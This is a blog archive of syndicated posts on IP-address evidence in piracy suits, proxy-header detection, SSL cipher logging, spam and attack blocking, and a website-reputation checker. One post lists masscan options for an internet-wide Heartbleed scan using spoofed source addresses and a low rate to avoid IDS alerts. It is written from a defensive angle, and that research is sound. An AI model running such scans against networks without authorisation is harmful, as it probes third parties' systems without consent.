Posts tagged ‘ip address’

TorrentFreak: Lawfirm Chasing Aussie ‘Pirates’ Discredited IP Address Evidence

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

There are many explanations for the existence of online piracy, from content not being made available quickly enough to it being sold at ripoff prices. Unfortunately for Australians, over the years most of these complaints have had some basis in fact.

The country is currently grappling with its piracy issues and while there’s hardly a consensus of opinion right now, most of the region’s rightsholders feel that suing the general public isn’t the way to go. It’s painful for everyone involved and doesn’t solve the problem.

That said, US-based Dallas Buyers Club LLC are not of the same opinion. They care about money and to that end they’re now attempting to obtain the identities of iiNet users for the purpose of extracting cash settlements from them.

Yesterday additional information on the case became available. An Optus spokeswoman told SMH that it had been contacted by Dallas Buyers Club about handing over subscriber data but its legal representatives had backed off when it was denied. The movie outfit didn’t even try with Telstra – but why?

So-called copyright trolls like the easiest possible fight and through iiNet they know their adversaries just that little bit better. According to Anny Slater of Slaters Intellectual Property Lawyers, documents revealed in the ISP’s earlier fight with Village Roadshow show that Telstra could well be a more difficult target for discovery.

The business model employed by plaintiffs such as Dallas Buyer’s Club LLC (DBCLLC) requires a minimum of ‘difficult’ since difficulties increase costs and decrease profits. To that end, part of the job of keeping things straightforward will fall to DBCLLC’s lawfirm, Sydney-based Marque Lawyers.

Unfortunately for DBCLLC, Marque Lawyers have already shot themselves in the foot when it comes to convincing DBCLLC’s “pirate” targets to “pay up or else.”

In 2012, Marque published a paper titled “It wasn’t me, it was my flatmate! – a defense to copyright infringement?” which detailed the company’s stance on file-sharing accusations. The publication provided a short summary of cases in the US where porn companies were aiming to find out the identities of people who had downloaded their films, just as Dallas Buyers Club – Marque’s clients – are doing now.

“To find out the actual identities of the users, the [porn companies] asked the Court to force the ISPs to reveal the names and addresses of each of the subscribers to which the IP addresses related. The users went on the attack and won,” Marque explained.

And here’s the line all potential targets of Dallas Buyers Club and Marque Lawyers should be aware of – from the lawfirm’s own collective mouth.

“The judge, rightly in our view, agreed with the users that just because an IP address is in one person’s name, it does not mean that that person was the one who illegally downloaded the porn.

As the judge said, an IP address does not necessarily identify a person and so you can’t be sure that the person who pays for a service has necessarily infringed copyright.

This decision makes a lot of sense to us. If it holds up, copyright
owners will need to be a whole lot more savvy about how they identify and pursue copyright infringers and, perhaps, we’ve seen the end of the mass ‘John Doe’ litigation.”

So there you have it. Marque Lawyers do not have faith in the IP address-based evidence used in mass file-sharing litigation. In fact, they predict that weaknesses in IP address evidence might even signal the end of mass lawsuits.

Sadly they weren’t right in their latter prediction, as their partnership with Dallas Buyers Club reveals. Still, their stance that the evidence is weak remains and will probably come back to bite them.

The document is available for download from Marque’s own server. Any bill payers wrongly accused of piracy by the company in the future may like to refer the lawfirm to its own literature as part of their response.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

The Hacker Factor Blog: By Proxy

This post was syndicated from: The Hacker Factor Blog and was written by: The Hacker Factor Blog. Original post: at The Hacker Factor Blog

As I tweak and tune the firewall and IDS system at FotoForensics, I keep coming across unexpected challenges and findings. One of the challenges is related to proxies. If a user uploads prohibited content from a proxy, then my current system bans the entire proxy. An ideal solution would only ban the user.

Proxies serve a lot of different purposes. Most people think about proxies in regards to anonymity, like the TOR network. TOR is a series of proxies that ensure that the endpoint cannot identify the starting point.

However, there are other uses for proxies. Corporations frequently have a set of proxies for handling network traffic. This allows them to scan all network traffic for potential malware. It’s a great solution for mitigating the risk from one user getting a virus and passing it to everyone in the network.

Some governments run proxies as a means to filter content. China and Syria come to mind. China has a custom solution that has been dubbed the “Great Firewall of China“. They use it to restrict site access and filter content. Syria, on the other hand, appears to use a COTS (commercial off-the-shelf) solution. In my web logs, most traffic from Syria comes through Blue Coat ProxySG systems.

And then there are the proxies that are used to bypass usage limits. For example, your hotel may charge for Internet access. If there’s a tech convention in the hotel, then it’s common to see one person pay for the access, and then run his own SOCKS proxy for everyone else to relay out over the network. This gives everyone access without needing everyone to pay for the access.

Proxy Services

Proxy networks that are designed for anonymity typically don’t leak anything. If I ban a TOR node, then that node stays banned since I cannot identify individual users. However, the proxies that are designed for access typically do reveal something about the user. In fact, many proxies explicitly identify who’s request is being relayed. This added information is stuffed in HTTP header fields that most web sites ignore.

For example, I recently received an HTTP request from that contained the HTTP header “X-Forwarded-For:″. If I were to ban the user, then I would ban “″, since that system connected to my server. However, is and is part of a proxy network. This proxy network identified who was relaying with the X-Forwarded-For header. In this case, “″ is someone in Yemen. If I see this reference, then I can start banning the user in Yemen rather than the Google Proxy that is used by lots of people. (NOTE: I changed the Yemen IP address for privacy, and this user didn’t upload anything requiring a ban; this is just an example.)

Unfortunately, there is no real standard here. Different proxies use different methods to denote the user being relayed. I’ve seen headers like “X-Forwarded”, “X-Forwarded-For”, “HTTP_X_FORWARDED_FOR” (yes, they actually sent this in their header; this is NOT from the Apache variable), “Forwarded”, “Forwarded-For-IP”, “Via”, and more. Unless I know to look for it, I’m liable to ban a proxy rather than a user.

In some cases, I see the direct connection address also listed as the relayed address; it claims to be relaying itself. I suspect that this is cause by some kind of anti-virus system that is filtering network traffic through a local proxy. And sometimes I see private addresses (“private” as in “private use” and “should not be routed over the Internet”; not “don’t tell anyone”). These are likely home users or small companies that run a proxy for all of the computers on their local networks.

Proxy Detection

If I cannot identify the user being proxied, then just identifying that the system is a proxy can be useful. Rather than banning known proxies for three months, I might ban the proxy for only a day or a week. The reduced time should cut down on the number of people blocked because of the proxy that they used.

There are unique headers that can identify that a proxy is present. Blue Coat ProxySG, for example, adds in a unique header: “X-BlueCoat-Via: abce6cd5a6733123″. This tracking ID is unique to the Blue Coat system; every user relaying through that specific proxy gets the same unique ID. It is intended to prevent looping between Blue Coat devices. If the ProxySG system sees its own unique ID, then it has identified a loop.

Blue Coat is not the only vendor with their own proxy identifier. Fortinet’s software adds in a “X-FCCKV2″ header. And Verizon silently adds in an “X-UIDH” header that has a large binary string for tracking users.

Language and Location

Besides identifying proxies, I can also identify the user’s preferred language.

The intent with specifying languages in the HTTP header is to help web sites present content in the native language. If my site supports English, German, and French, then seeing a hint that says “French” should help me automatically render the page using French. However, this can be used along with IP address geolocation to identify potential proxies. If the IP address traces to Australia but the user appears to speak Italian, then it increases the likelihood that I’m seeing an Australian proxy that is relaying for a user in Italy.

The official way to identify the user’s language is to use an HTTP “Accept-Language” header. For example, “Accept-Language: en-US,en;q=0.5″ says to use the United States dialect of English, or just English if there is no dialect support at the web site. However, there are unofficial approaches to specifying the desired language. For example, many web browsers encode the user’s preferred language into the HTTP user-agent string.

Similarly, Facebook can relay network requests. These appear in the header “X-Facebook-Locale”. This is an unofficial way to identify when Facebook being use as a proxy. However, it also tells me the user’s preferred language: “X-Facebook-Locale: fr_CA”. In this case, the user prefers the Canadian dialect of French (fr_CA). While the user may be located anywhere in the world, he is probably in Canada.

There’s only one standard way to specify the recipient’s language. However, there are lots of common non-standard ways. Just knowing what to look for can be a problem. But the bigger problem happens when you see conflicting language definitions.

Accept-Language: de-de,de;q=0.5

User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; it-it; SAMSUNG SM-G900F/G900FXXU1ANH4 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.6 Chrome/28.0.1500.94 Mobile Safari/537.36

X-Facebook-Locale: es_LA

x-avantgo-clientlanguage: en_GB

x-ucbrowser-ua: pf(Symbian);er(U);la(en-US);up(U2/1.0.0);re(U2/1.0.0);dv(NOKIAE90);pr

X-OperaMini-Phone-UA: Mozilla/5.0 (Linux; U; Android 4.4.2; id-id; SM-G900T Build/id=KOT49H.G900SKSU1ANCE) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30

If I see all of these in one request, then I’ll probably choose the official header first (German from German). However, without the official header, would I choose Spanish from Latin America (“es-LA” is unofficial but widely used), Italian from Italy (it-it) as specified by the web browser user-agent string, or the language from one of those other fields? (Fortunately, in the real world these would likely all be the same. And you’re unlikely to see most of these fields together. Still, I have seen some conflicting fields.)

Time to Program!

So far, I have identified nearly a dozen different HTTP headers that denote some kind of proxy. Some of them identify the user behind the proxy, but others leak clues or only indicate that a proxy was used. All of this can be useful for determining how to handle a ban after someone violates my site’s terms of service, even if I don’t know who is behind the proxy.

In the near future, I should be able to identify at least some of these proxies. If I can identify the people using proxies, then I can restrict access to the user rather than the entire proxy. And if I can at least identify the proxy, then I can still try to lessen the impact for other users.

SANS Internet Storm Center, InfoCON: green: Logging SSL, (Thu, Oct 16th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

With POODLE behind us, it is time to get ready for the next SSL firedrill. One of the questions that keeps coming up is which ciphers and SSL/TLS versions are actually in use. If you decide to turn off SSLv3 or not depends a lot on who needs it, and it is an important answer to have ready should tomorrow some other cipher turn out to be too weak.

But keep in mind that it is not just numbers that matter. You also need to figure out who the outliers are and how important (or dangerous?) they are. So as a good start, try to figure out how to log SSL/TLS versions and ciphers. There are a couple of options to do this:

In Apache, you can log the protocol version and cipher easily by logging the respective environment variable [1] . For example:
CustomLog logs/ssl_request_log %t %h {User-agent}i%{SSL_PROTOCOL}x %{SSL_CIPHER}x

Logs SSL protocol and cipher. You can add this to an existing access log, or create a new log. If you decide to log this in its own log, I suggest you add User-Agent and IP Address (as well as time stamp).

In nginx, you can do the same by adding$ssl_cipher $ssl_protocolto the log_format directive in your nginx configuration. For example:

log_format ssl $remote_addr $http_user_agent $ssl_cipher $ssl_protocol

Should give you a similar result as for apache above.

If you have a packet sniffer in place, you can also use tshark to extract the data. With t-shark, you can actually get a bit further. You can log the client hello with whatever ciphers the client proposed, and the server hello which will indicate what cipher the server picked.

tshark -r ssl -2R ssl.handshake.type==2 or ssl.handshake.type==1 -T fields -e ssl.handshake.type -e ssl.record.version -e ssl.handshake.version -e ssl.handshake.ciphersuite

For extra credit log the host name requested in the client hello via SNI and compare it to the actual host name the client connects to.

Now you can not only collect Real Data as to what ciphers are needed, but you can also look for anomalies. For example, user agents that request very different ciphers then other connections that claim to originate from the same user agent. Or who is asking for weak ciphers? Maybe a sign for an SSL downgrade attack? Or an attack tool using and older SSL library…


Johannes B. Ullrich, Ph.D.

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

TorrentFreak: Anti-Piracy Group Plans to Block In Excess of 100 Sites

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

stop-blockedWhen copyright holders turn to the courts for a solution to their problems it’s very rare that dealing with one site, service or individual is the long-term aim. Legal actions are designed to send a message and important decisions in rightsholders’ favor often open the floodgates for yet more action.

This is illustrated perfectly by the march towards large-scale website blocking in several regions around the world.

A topic pushed off the agenda in the United States following the SOPA debacle, web blockades are especially alive and well in Europe and living proof that while The Pirate Bay might the initial target of Hollywood and the record labels, much bigger plans have always been in store.

A typical example is now emerging in Austria. Having spent years trying to have streaming sites, and Movie4K blocked at the ISP level, anti-piracy group VAP has just achieved its aims. Several key local ISPs began blocking the sites this month but the Hollywood affiliated group has now admitted that they’ve had bigger plans in mind all along.

Speaking with DerStandard, VAP CEO Werner Müller has confirmed that his group will now work to have large numbers of additional sites banned at the ISP level.

Using a term often used by Dutch anti-piracy group BREIN, Müller says his group has compiled a list of sites considered by the movie industry to be “structurally infringing”. The sites are expected to be the leaders in the torrent, linking and streaming sector, cyberlockers included. IFPI has already confirmed it will be dealing with The Pirate Bay and two other sites.

The VAP CEO wouldn’t be drawn on exact numbers, but did confirm that a “low three digit” number of domains are in the crosshairs for legal action.

Although Austria is in the relatively early stages, a similar situation has played out in the UK, with rightsholders obtaining blocks against some of the more famous sites and then streamlining the process to add new sites whenever they see fit. Dozens of sites are now unavailable by regular means.

If VAP has its way the blockades in Austria will be marginally more broad than those in the UK, affecting the country’s eighth largest service providers and affecting around 95% of subscribers.

Of course, whenever web blockades are mentioned the topic of discussion turns to circumvention. In Austria the blockades are relatively weak, with only DNS-based mitigation measures in place. However, VAP predicts the inevitable expansion towards both DNS and IP address blocking and intends to head off to court yet again to force ISPs to implement them.

Describing the Internet as a “great machine” featuring good and bad sides, Müller says that when ordering website blocks the courts will always appreciate the right to freedom of expression.

“But there’s no human right to Bruce Willis,” he concludes.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

TorrentFreak: Gottfrid Svartholm Hacking Trial Nears Conclusion

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

gottfridThe hacking trial of Gottfrid Svartholm and his alleged 21-year-old Danish accomplice concluded this week in Copenhagen, Denmark. Gottfrid is most well known as one of the founders of The Pirate Bay, but his co-defendant’s identity is still being kept out of the media.

The sessions this week, on October 7 and 10, were used for summing up by the prosecution and defense. Danish language publication, which has provided good coverage of the whole trial, reports that deputy prosecutor Anders Riisager used an analogy to describe their position on Gottfrid.

Prosecution: Hands in the cookie jar

“If there is a cookie jar on the table with the lid removed, and your son is sitting on the sofa with cookie crumbs on his mouth, it is only reasonable to assume that it is he who has had his paws in the cookie jar,” he said.

“This, even though he claims it is four of his friends who have put the cookies into his mouth. And especially when the son will not reveal who his friends are, or how it happened.”

Riisager was referring to the evidence presented by the prosecution that Gottfrid and his co-defendant were the people behind hacker attacks on IT company CSC which began in 2012.

The Swede insists that while the attack may have been carried out from his computer, the computer itself was used remotely by other individuals, any of whom could have carried out the attacks. Leads and names provided by Gottfrid apparently led the investigation nowhere useful.

Remote access unlikely

That third-parties accessed Gottfrid’s computer without his knowledge is a notion rejected by the prosecution. Noting that the Pirate Bay founder is a computer genius, senior prosecutor Maria Cingari said that maintaining secret access to his machine over extended periods would not have been possible.

“It is not likely that others have used [Gottfrid's] computer to hack CSC without him discovering something. At the same time the hack occurred over such a long time that remote control is unlikely,” she said.

And, Cingari noted, it was no coincidence that chatlogs found on Gottfrid’s computer related to so-called “zero-day” vulnerabilities and the type of computer systems used by CSC.

Dane and Swede working together

In respect of Gottfrid’s co-defendant, the prosecution said that the 21-year-old Dane knew that when he was speaking online with a user known as My Evil Twin (allegedly Gottfrid), the plan was a hacker attack on CSC.

Supporting their allegations of collusion, the prosecution noted that the Dane had been living in Cambodia when the attacks on CSC began and while a hacker attack against Logica, a crime for which Gottfrid was previously sentenced, was also underway. The Dane spent time in a café situated directly under Gottfrid’s apartment, the prosecution said.

Why not hand over the encryption keys?

When police raided the Dane they obtained a laptop, the contents of which still remain a secret due to the presence of heavy encryption. The police found a hollowed-out chess piece containing the computer’s SDcard key, but that didn’t help them gain access. Despite several requests, the 21-year-old has refused to provide keys to unlock the data on the Qubes OS device, arguing there is nothing on there of significance. According to the prosecution, this is a sign of guilt.

“It is very striking that one chooses to sit in prison for a year and more, instead of just helping the police with access to the laptop so they can see that it contains nothing,” senior prosecutor Maria Cingari said.

Cingari also pointed the finger at the Dane for focusing Gottfrid’s attention on CSC.

“You can see that [the Dane] has very much helped [Gottfrid] with obtaining access to CSC’s mainframe. It is not even clear that he would have set his sights on CSC, if it had not been for [the Dane],” she said.

Defense: No objectivity

On Friday, defense lawyer Luise Høj began her closing arguments with fierce criticism of a Danish prosecution that uncritically accepted evidence provided by Swedish police and failed to conduct an objective inquiry.

“They took a plane to Stockholm and were given some material. It was placed in a bag and they took the plane back home. From there they went to CSC and asked them to look for clues. This shows a lack of an independent approach to the evidence,” she said.

Furthermore, the mere fact that CSC had been investigating itself under direction of the police was also problematic.

“The victim should not investigate itself. CSC is at risk of being fired as the state’s IT provider,” Høj noted.

Technical doubt

Computer technicians presented by both sides, including famous security expert Jacob Appelbaum, failed to agree on whether remote access had been a possibility, but this in itself should sway the court to acquit, Høj said.

“It must be really difficult for the court to decide whether the computer was controlled remotely or not, when even engineers disagree on what has happened,” she noted.

Why not take time to investigate properly?

Høj also took aim at the police who she said had failed to properly investigate the people Gottfrid had previously indicated might be responsible for the hacker attacks.

“My client has in good faith attempted to come up with some suggestions as to how his computer was remotely controlled. Of course he did not provide a complete explanation of how it happened, as he did not know what had happened and he has not had the opportunity to examine his computer,” she said.

Additionally, clues that could’ve led somewhere were overlooked, the defense lawyer argued. For instance, an IP address found in CSC’s logs was traced back to a famous Swedish hacker known as ‘MG’.

“The investigation was not objective. I do not understand why it’s not possible to investigate clues that don’t take much effort to be investigated,” Høj said. “The willingness to investigate clues that do not speak in favor of the police case has been minimal.”

A decision in the case is expected at the end of the month. If found guilty, Gottfrid faces up to four years in jail.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

The Hacker Factor Blog: Bellwether

This post was syndicated from: The Hacker Factor Blog and was written by: The Hacker Factor Blog. Original post: at The Hacker Factor Blog

For the last few months, I have been seeing a huge up-tick on two kinds of traffic: spam and network attacks. Over the last few weeks, I have realized that they are directly related.

“I don’t want any SPAM!” — Monty Python

I used to take pride in my ability to stay off spam mailing lists. For over 12 years, I have averaged 4-8 spam messages per day without using any kind of mail filters. That all changed earlier this year, when I suddenly began getting about 50 undesirable emails per day. That’s when I first enabled the commonly used mail filter called spamassassin.

Although spamassassin reduced the flood by 50%, some spam still got through. Meanwhile the amount of spam dramatically increased from 50 messages per day to 500 or more per day. I tweaked a couple of the spamassassin rules and added in some procmail rules at the final mailbox. Now I’m down to a few hundred per day getting past spamassassin and about 10 per day that make it past my procmail rules.

The good news is that I am very confident that I am not losing any legitimate emails. The bad news is that spammers seem to be seriously upping the volume since at least March of this year.

Each time I register with a new online service, I try to use a different email address. This way, if any service I use has their list acquired by spammers, then I know which server caused the problem. Unfortunately, most of these messages are not going to my service-specific addresses. Instead, they are going to one of my three primary accounts that I give out to people. I suspect that someone I know got infected and had their address list stolen.

These high-volume spam messages are coming from specific subnets. It appears that 2-3 spam groups are purchasing subnets from small hosting providers and then spamming like crazy until they get shutdown. Moreover, the hosting providers appear to be ignoring complaints and permitting the abuse. So far, I have banned all emails from 191.101.xx.xx, 192.3.xx.xx, 103.252.xx.xx, 204.15.135.xx, and 209.95.38.xx. These account for over 800 emails to me over the last month.

I’m not the only person seeing this large increase in spam. There have been similar reports at forums like Symantec and Ars Technica. According to Cisco, spam has increased more than 3x since 2013.

“Oh, what a tangled web we weave when first we practise to deceive!” — Walter Scott

Coinciding with the increase in spam is an increase in web attacks. I have seen nearly a 3x increase in web-based scans and attacks in the last year. Because of this, I have added additional filters to identify these attacks and block the offending addresses.

Using data collected at FotoForensics, I began to look up the banned IP addresses using over 30 different dnsbl sites. About 40% of the time, the address is already associated with suspicious web activity (e.g., port scanning and attacks) and 70% of the time they are already associated with spam.

I have graphed out the attackers over the last 75 days. The size of the dot represents the percent of traffic. Red denotes cities and yellow denotes countries (when the city is unknown). Mousing-over the picture shows the per-country distribution.

Since I am blocking access immediately, there is only one attack recorded per IP address. If a city or country has multiple sightings, then those are multiple addresses that geolocated to the same city/country.

Although the United States generates largest number of network attacks, it is really from cities all over the place. There is no central city. The eight cities that generate the most attacks are Hanoi (Vietnam), Fuzhou (China), Guangzhou (China), Bangkok (Thailand), Nanjing (China), Taipei (Taiwan), Istanbul (Turkey), and Chongqing (China).

The top 10 counties that have attacked my sites are: USA (with 70 sightings), China (62), Germany (42), Ukraine, Thailand, Vietnam, South Korea, India, Taiwan, and Turkey.

Most of these attacks appear to come from subnets. For example, Hetzner Online AG (AS24940) has two subnets that are explicitly used for network attacks: – and – Every IP address in these ranges has explicitly conducted a web-based attack against my server.

By detecting these attacks and blocking access immediately, I’ve seen one other side-effect: a huge (20%) drop in volume from other network addresses. The attacks that I am blocking appear to be bellwethers; if these attacks are not blocked then others will follow. Blocking the bellwether stops the subsequent scans and attacks from other network addresses. This theory was easy enough to test: rather than banning, I just recorded a few of the network attacks and allowed them to continue. This resulted in an increase in attacks from other countries and subnets. Blocking the attacks caused a direct drop in hostile traffic from all over the place.

“Coincidence is God’s way of remaining anonymous.” — Albert Einstein

While I was collecting information on attackers, I tested a few other types of online tracking. For example, it is easy enough for my server to identify if the recipient is using an anonymizing network. I wanted to see if attacks correlated with these systems. Amazingly, the distribution of attacks from anonymous proxies is not significantly different from non-proxy addresses. I could find no correlation.

Here’s the locations of detected anonymizers that accessed my site. This also includes botnets that distribute links to scan across network addresses. Again, each IP address is only counted once:

When it comes to anonymity, we’re mapping the anonymous exit address to a location. With TOR users, you may be physically in France but using an address in Australia. We would count it as Australia and not France. Amazingly, there are not many TOR nodes in this graph. (Probably because many TOR nodes have been banned for being involved in network attacks.)

In these maps, you’ll also notice a yellow dot in the water off the west coast of Africa. That’s latitude,longitude “0,0″ and denotes addresses that cannot be mapped back to countries. These are completely anonymous servers and satellite providers. (But keep in mind: just because your server cannot be geolocated, it does not mean that you are truly anonymous.)

The big dots in California are from Google and Microsoft. Their bots appear because they constantly change addresses (like TOR users). The big dot in Japan is Trend Micro. However, the single biggest group of anonymity users are in Saudi Arabia. They change addresses and anonymize HTTP headers like crazy! Asia is also really big on anonymizing systems. I assume that this is because their users are either trying to bypass government filters or are unaware that their traffic is being hijacked by government filters. In contrast, Germany and Poland appear big due to the sheer number of TOR nodes.

Finally, I tried to correlate the use of network attacks or anonymity systems to people who upload prohibited content to FotoForensics.

There is really no correlation at all. The more conservative areas, like Saudi Arabia, most of the Middle East, and Asia, rarely upload pornography, nudity, or sexually explicit content. In contrast, the United States and Europe really like their porn. (Germany is mostly due to the >_ forum that I previously mentioned. Even when shown a warning that they are about to be banned, nearly 80% of the time they consciously choose to continue and get banned. Idiots.)

“It is madness for sheep to talk peace with a wolf.” — Thomas Fuller

By actively blocking the initial bellwether network scans, I have seen that it dramatically reduces the number of follow-up attacks. Overall, I see a significant drop in scans, harvesters, and even comment spammers. Since these addresses are associated with unsolicited email, immediately stopping them from accessing the web server should result in an immediate drop in the volume of spam.

I have since deployed my blocking technology from at In the last four days, it blocked over 300 network addresses that were scanning for vulnerabilities, uploading comment-spam, and searching for network addresses.

However, FotoForensics and are very small web sites compared to most other online services. Any impact from my own blocking is likely to be insignificant across the whole world. However, it does demonstrate one finding related to spam: there is a direct correlation between web-based scans and attacks, and systems that generate spam emails. If big companies temporarily block access when a hostile scan is detected, then the overall volume of spam across the world should be rapidly reduced.

Darknet - The Darkside: IPFlood – Simple Firefox Add-on To Hide Your IP Address

This post was syndicated from: Darknet - The Darkside and was written by: Darknet. Original post: at Darknet - The Darkside

IPFlood (previously IPFuck) is a Firefox add-on created to simulate the use of a proxy. It doesn’t actually change your IP address (obviously) and it doesn’t connect to a proxy either, it just changes the headers (that it can) so it appears to any web servers or software sniffing – that you are in fact [...]

The post IPFlood…

Read the full post at

Errata Security: Six-month anniversary scan for Heartbleed

This post was syndicated from: Errata Security and was written by: Robert Graham. Original post: at Errata Security

I just launched my six-month anniversary scan for Heartbleed. I’ll start reporting early results tomorrow afternoon. I’m dialing the scan to run slowly and spreading it across four IP addresses (and 32k ports) in order to avoid unduly alarming people.

If you would like the results of the scan for your subnet, send us your address ranges to our “abuse@” email address. We’ll lookup the abuse contact email for those ranges and send you what we found for that range. (This offer good through the end of October 2014).

Here is a discussion of the options.

–conf /etc/masscan/masscan.conf
You don’t see this option, but it’s the default. This is where we have the ‘excluderanges’ configured. Because we exclude everyone who contacts us an “opts-out” of our white-hat scans, we are down to scanning only 3.5 billion hosts now, out of around 4 billion.
The the “/0″ means “the entire Internet”. Actually, any valid IPv4 address can replace the and it’ll produce the same results, such as “″ to amuse your friends.

This says to scan on port 443, the default SSL port. At some point in the future, I’ll scan for some other common SSL ports, including the STARTTLS ports like port 25.

This means to create a full TCP connection with the system and grab “banner” info. In this case, that means sending an SSL “hello” request and to parse the received X.509 certificate. It’ll parse that certificate and dump the hostname from it.

–capture cert
This means to also capture the X.509 certificate. I don’t really care for this scan, but on general principles, grabbing certificates is good for other SSL research. This happens before the heartbleed check.

This means that after the initial SSL Hello that it will attempt a “Heartbleed” request. In this case, the returned information will just be a “VULN: [Heartbleed]” message for the IP address. If you want more, then “–capture heartbleed” an also be used to grab the “bleeding” information. I don’t do that.

-oB heartbleed.scan
This means to save the results in a binary file called “heartbleed.scan”. This is the custom masscan format that can be read using the –readscan option later to convert to XML, JSON, and other output formats. I always scan using this format, but I think I’m the only one.

–rotate-dir /var/log/masscan
You don’t see it here on the command-line because it’s in masscan.conf (see above), but every hour the contents of “heartbleed.scan” are rotated into this directory and a new file created. That file is timestamped with the current time.

–rotate hourly
You don’t see it here, but it’s in masscan.conf. This means that rotation to /var/log/masscan should happen every hour on the hour. If you start a scan at 1:55, it’ll be rotated at 2:00. It renames the file with the timestamp as the prefix, like 141007-020000-heartbleed.scan, so having it aligned to an even hour makes things easier to work with. Note that “minutely” and “daily” are also supported.

–rate 80000
People don’t like getting scanned to fast, it makes IDS and firewall logs unhappy. Therefore, I lower the rate to only 80,000 packets/second to reduce their strain. This consequently means the scan is going to take 13 hours to complete.

On the same principle as slowing the rate, spreading across multiple source IP address makes IDS/firewalls squawk less, and makes people less unhappy. We have only a small range to play with, so I’m only using 4 IP addresses. Note that masscan has it’s own TCP/IP stack — it’s “spoofing” these IP addresess, no machine actually exists here. If you try to ping them, you’ll get no response. This is the best way to run masscan, though people still find it confusing.

–source-port 32768-65535
By default, masscan uses a randomly assigned source port. I prefer to use a range of source ports.

The Hacker Factor Blog: Downward Trend

This post was syndicated from: The Hacker Factor Blog and was written by: The Hacker Factor Blog. Original post: at The Hacker Factor Blog

Over the last few months, I have been enhancing my network defenses at FotoForensics. It is no longer enough to just block bad actors. I want to know who is attacking me, what is their approach and any other information. I want to “know my enemy”.

To gain more knowledge, I’ve begun to incorporate DNS blacklist data. There are dozens of servers out there that use DNS to query various non-network databases. Rather than resolving a hostname to a network address, they encode an address in the hostname and return a code that denotes the type of threat.

This becomes extremely useful when identifying a network attacker. Is the attack personal, or is it a known bot that is attacking everyone on the Internet? Is it an isolated system, or part of a larger network? Is it coming directly, or hiding behind an anonymous proxy network? Today, FotoForensics just identifies attacks. Tomorrow it will identify attackers.

Reputation at Stake

Beyond DNS lookup systems, there are some reputation-based query services. While the DNS blocklist (dnsbl) services are generally good, the web based reputation systems vary in quality. Many of them seem to be so inaccurate or misleading as to be borderline snake oil.

Back in 2012, I wrote about Websense and how their system really failed to work. This time, I decided to look at Trend Micro.

The Trend Micro Site Safety system takes a URL and tells you whether it is known hostile or not. It even classifies the type of service, such as shopping, social, or adult content.

To test this system, I used FotoForensics as the URL.

According to them, my server has never been evaluated before and they would evaluate it now. I looked at my logs and, yes, I saw them query my site: – - [05/Oct/2014:06:35:45 -0500] “GET / HTTP/1.1″ 200 139 “-” “Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)” – - [05/Oct/2014:06:52:05 -0500] “GET / HTTP/1.1″ 200 139 “-” “Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)”

The first thing I noticed is that it never crawled my site. It only looked at the opening page. They downloaded no images, ignored the CSS, and didn’t look anywhere else for text to analyze. This is the same mistake that Websense made.

The second thing I noticed was the lie: They say that they have never looked at my site before. Let’s look back at my site’s web logs. The site was publicly announced on February 9, 2012. – - [10/Feb/2012:03:28:56 -0600] “GET / HTTP/1.0″ 200 1865 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)” – - [10/Feb/2012:05:55:32 -0600] “GET / HTTP/1.0″ 200 1865 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)” – - [10/Feb/2012:12:16:30 -0600] “GET / HTTP/1.0″ 200 1865 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)” – - [10/Feb/2012:12:16:34 -0600] “GET / HTTP/1.0″ 200 1865 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)” – - [10/Feb/2012:23:21:51 -0600] “GET / HTTP/1.0″ 200 1865 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)” – - [11/Feb/2012:06:51:29 -0600] “GET / HTTP/1.0″ 200 1865 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)” – - [14/Feb/2012:02:00:48 -0600] “GET / HTTP/1.0″ 200 1865 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)” – - [14/Feb/2012:03:24:48 -0600] “GET / HTTP/1.0″ 200 1865 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)” – - [14/Feb/2012:03:25:51 -0600] “GET / HTTP/1.0″ 200 1865 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”

All of these network addresses are Trend Micro. According to my logs, they visit my site and the “/” URI often. Usually multiple times per day. There were 1,073 visits in 2012, 4,443 visits in 2013, and over 2,463 (so far) in 2014. So I certainly do not believe them when their page says that they have never visited the site before.

Since they clearly scanned my site, I wanted to see the results. I rechecked their service an hour later, a few hours later, and over a day later. They still report it as being untested.

Uploading Content

Trend Micro first got my attention back in 2012, when they were automatically banned for uploading porn to FotoForensics. What happened: someone using Trend Micro’s reputation software uploaded porn to FotoForensics. A few seconds later, the reputation system checked the URL and ended up uploading the same porn, resulting in an automatic ban.

This second upload happened because Trend Micro was checking a GET request. And in this case, the GET was used to upload a URL containing porn to my site.

Besides performing a double upload, these duplicate requests can cause other problems. You know all of those online shopping sites that say “Do not reload or your credit card may be charged a second time”? Trend Micro might cause that second click since they resubmit URLs.

I also noticed that Trend Micro’s reputation checker would occasionally upload URL-based attacks to my site. It appears that some bad guys may be using the reputation checker to proxy attacks. This way, if the attack succeeds then the bad guy can get in. And if it is noticed, then the sysadmins would blame Trend Micro. (These attacks stand out in my logs because Trend Micro uploads a URL that nobody else uploads.)

